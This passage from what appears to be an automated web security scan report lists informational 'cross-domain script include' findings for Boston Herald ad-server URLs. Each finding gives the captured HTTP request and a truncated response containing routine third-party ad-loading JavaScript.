document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.270. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:50 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.271. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:19 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:22 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.272. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:18 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:21 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.273. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:51 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.274. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:45:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:36:39 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.275. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:54 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.276. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:46 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.277. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3621
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:07 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.278. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:51 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:53 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.279. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

Issue detail

The response dynamically includes the following script from another domain (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
